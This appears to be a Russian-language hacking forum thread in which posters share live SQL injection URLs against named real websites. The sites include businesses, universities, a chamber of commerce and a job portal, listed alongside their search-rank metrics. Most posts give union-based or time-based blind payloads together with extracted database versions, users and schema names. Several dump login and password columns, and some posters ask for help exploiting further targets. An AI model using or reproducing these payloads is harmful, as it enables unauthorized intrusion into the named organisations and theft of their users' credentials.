ТИц 0; PR 4; DMOZ; PHP: http://www.1000websitetools.net/wrong_description_report.php?id=1"/**//*!union/**/select/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16*/--+h ТИц 0; PR 3; PHP: http://www.greatcapevacations.com/view_details.php?propid=1'/**//*!'ololo'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,version(),16,17,18,19,20,21,22,23*/--+h
Code: http://bee-network.co.za/bee_news.php?id=-19+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8-- 5.1.66-0+squeeze1:[email protected]:bee_network
Code: http://stargaze.footholds.net/product.php?productid=-6+UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,21,22,23,24,25--
Code: http://www.darknagar.ru/ru/ press.php?sec tion=reviews&id=-23+un ion+select+1,2,3, 4,5,6,ve rsion(),8,9,10,11--
ТИЦ 325, ПР5 PHP: http://www.prosveshenie.tv/index.php?id=3&item=-17+union+select+1,version(),3,4,5,6,7,8,9,10,11-- ПР3 PHP: kosmetika.by/news.php?mode=show&id=-17+union+select+1,2,3,version(),5,6-- ТИЦ130, ПР3 PHP: http://www.adm.ua/tech_view.php?id=-17+union+select+1,2,3,4,5,6-- ТИЦ180 PHP: http://www.mmk6.oblzdrav.ru/news.php?id=-17+union+select+1,2,version(),4,5-- ТИЦ20. ПР5 PHP: http://aviabilet.by/add_item.php?id=-17+union+select+version(),2,3--
Code: http://www.alena-oil.ru/index.php?id=-36+Union+SEleCT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16--
Code: http://www.bowtieoverdrives.com/catalog/catalog_inc/viewitem.php?ITEMID=-9+union+select+1,ve rsion(),3,4,5,datab ase(),7,user( ),9,10,11,12, 13,14,1 5--
huecu.org PR-5 Code: https://www.huecu.org/otherpage.php?pageID=-38+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+--+ Code: 5.0.95-rs-log:mindfire_huecu@localhost:web socialchamber.com PR-5 Code: www.socialchamber.com/mod/chamber/view.php?news_id=-1048+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),user(),database()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+--+ Code: 5.0.96-community-log:socialch_user1@localhost:socialch_elgg asiamediajournal.com PR-5 Code: www.asiamediajournal.com/executive.php?id=-527+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,0,11,12,13,14,15,16+--+ Code: 5.0.22:mediaroute26@localhost:mediaroute26_com_-_amj
Code: http://www.magink.com/page. php ?id=-7+union+select+1,concat_ws(0x3a,ver sion (),user(),database()),3,4,5,6,7,8,9,1 0,11,12 ,13-- Code: 5.1.68-cll:maginka_magink@localhost:maginka_magink
Официальный сайт Московской торгово-промышленной Палаты moslogistika.mostpp.ru PHP: http://moslogistika.mostpp.ru/news.php?id=-14+union+select+1,2,3,4,version%28%29,6,7,8--+ 4.0.27 Яндекс тИЦ 1800 Google Page Rank 6
pr - 7 Code: www.miamisci.org/www/employment-detail.php?jobID=1+LIMIT+0,1+UNION+ALL+SELECT+1,1,1,1,1,1,1,1,CONCAT(0x203d3e20,IFNULL(CAST(cal_email+AS+CHAR),0x20),0x207c20,IFNULL(CAST(cal_is_admin+AS+CHAR),0x20),0x207c20,IFNULL(CAST(cal_login+AS+CHAR),0x20),0x207c20,IFNULL(CAST(cal_passwd+AS+CHAR),0x20),0x20),1,1+FROM+miamisci_calendar_ttec.webcal_user
PR:7 Code: http://www.alia.org[dot]au/employment/vacancies/listing.html?ID=-2211+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15+--+ PR:8 Code: http://www.interactivedata[dot]de/prdetail.php?pr=290%0aand%0a0%0aUNION%0aSELECT%0a1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16+--+
Code: http://www.emmaturle .com/gall ery.php?id=-55+union+select+@@ver sion,2,3-- 5.0.67-community-log-A-2 вывод в исходнике
скуль на сайте Народ, вот столкнулся с такой проблемкой: Не получается раскрутить скуль в POST.. Пробывал havij и acunetix - ни чего не получается. Сама ссылка http://vpo.hiik.ru/cgi-bin/soob.pl а POST-запрос: idstud=9299&passw=32631835&soobsh=1' После такой попытки эксплуатировать, в response headers выскакивает ошибка типа DBD: :mysql::db do failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''', flagproch=1' at line 1 at C:\Moodle19\server\vpocgi-bin\soob.pl line 25 Помогите, пожалуйста! Зараннее огромное спасибо!
conversionchronicles.com PR-5 Code: www.conversionchronicles.com/print.php?PageID=10'+union+select+111,222,333,444,555,66,777,888,999,000,concat_ws(0x3a,version(),user(),database()),121212,131313,141414+--+ Code: 5.0.95:[email protected]:convchron в исходниках php.yccd.edu PR-5 Code: php.yccd.edu/faculty/view_file.php?id=-516'+union+select+concat_ws(0x3a,version(),user(),database()),2,3+--+&type=file Code: 5.1.66-community:root@localhost:facultypages
Code: http://consult.ni da.ac.th/ en/pr oject_detail.php?id=-123+union+select+1,2,3,4,5,@@ basedir,7,concat_ws(0 x3a,version(),user(),database()),9,10,11,12,13 ,14,15,16,17,18,19, 20,21,22,23, 24,25,26,27, 28,29,30,31--
www.naukri.com Яндекс тИЦ (CY): 50 Alexa Rank: 433 Google PageRank (PR): 6 MySQL > 5.0.11 AND time-based blind Code: http://w28.naukri.com/advertiser/bms_hits.php?banner=1'+AND+6418=IF((ORD(MID((IFNULL(CAST(version()+AS+CHAR),0x2 0)),1,1))>64),SLEEP(5),6418)+AND+'QALq'='QALq version(): '5.1.24-rc-log' user: 'jobs'@'10.208.64.227' DBS: 'BMS, bms2, information_schema, test, test_old, zedo_demographics'
Oracle ТИЦ 60 ПР 2 Code: absoluttrade.ru/index.php?opt=product&cid1=-2046+union+select+null,null,table_name,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+sys.user_tables-- Вот только раскрутить не получилось. Буду рад помощи в асю.
www.johnlocke.org/fmm/display.html?id=-7937 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT CONCAT(0x5b20,IFNULL(CAST(user_login AS CHAR),0x20),0x203a20,IFNULL(CAST(user_pass AS CHAR),0x20),0x205d) FROM jlocke.wp_triad_users LIMIT 0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Смотрите код. http://triad.johnlocke.org/blog/wp-login.php